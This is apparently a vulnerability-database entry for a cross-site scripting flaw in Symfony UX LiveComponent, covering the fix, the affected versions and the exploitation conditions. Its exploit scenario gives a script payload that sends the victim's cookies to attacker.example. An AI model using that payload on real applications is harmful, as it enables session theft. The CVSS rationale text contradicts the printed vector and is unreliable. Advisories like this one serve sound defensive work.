Symfony UX LiveComponent CVE-2026-49210
LOWSeverity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AV:N because the endpoint is network-accessible; AC:H because exploitation requires non-default CORS or a same-origin pivot; UI:R because a victim must trigger the component re-render; S:C and C:L/I:L reflect standard reflected-XSS scope change with session/data impact.
Primary rating from Vendor (https://github.com/symfony/ux).
CVSS VectorVendor: https://github.com/symfony/ux
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
Description
Symfony\UX\LiveComponent\Util\ChildComponentPartialRenderer::createHtml() interpolates the $childTag argument directly into the HTML output as a tag name, without escaping or validation. The value originates from client-controlled JSON (children[id].tag) parsed by LiveComponentSubscriber and propagated through InterceptChildComponentRenderSubscriber, so an attacker who can reach the Live Component endpoint can inject arbitrary HTML, including <script> tags, on any re-render of a Live Component that contains at least one child component.
In the default configuration, the Live Component endpoint is gated by an Accept: application/vnd.live-component+html request-header check that cannot be set cross-origin without a CORS preflight, so the issue is primarily a defense-in-depth gap. It becomes directly exploitable on applications that have relaxed CORS to allow this header from untrusted origins, or that have been pivoted from another same-origin XSS.
Resolution
ChildComponentPartialRenderer now validates $childTag against a strict HTML tag-name regex before interpolating it, and rejects any value that doesn't match. Anything that wouldn't be a valid HTML tag is dropped before reaching the response.
The patch for this issue is available here for branch 2.x (and forward-ported to 3.x).
Credits
Symfony would like to thank Pascal Cescon for reporting the issue and Hugo Alliaume for providing the fix.
AnalysisAI
Cross-site scripting in symfony/ux-live-component allows network-accessible attackers to inject arbitrary HTML - including script tags - into re-rendered Live Component responses by supplying a malicious tag name via client-controlled JSON. Affected versions span composer/symfony/ux-live-component >= 2.8.0 < 2.36.0 and >= 3.0.0 < 3.1.0. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to be able to send a request with the Accept: application/vnd.live-component+html header to the application's Live Component endpoint. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Real-world exploitability is meaningfully constrained by the default same-origin restriction: the Live Component endpoint requires the Accept: application/vnd.live-component+html header, which browsers cannot send cross-origin without a CORS preflight. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker targeting an application with permissive CORS (allowing the Accept: application/vnd.live-component+html header cross-origin) crafts a malicious web page that causes a victim's browser to issue a Live Component re-render request with children[id].tag set to a payload such as li><script>document.location='https://attacker.example/steal?c='+document.cookie</script><li. The server interpolates this value unvalidated into the HTML response, which the Symfony UX JavaScript runtime injects into the victim's DOM, executing the script in the context of the target application's origin. … |
| Remediation | The primary fix is to upgrade symfony/ux-live-component to 2.36.0 (for 2.x installations) or 3.1.0 (for 3.x installations). … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today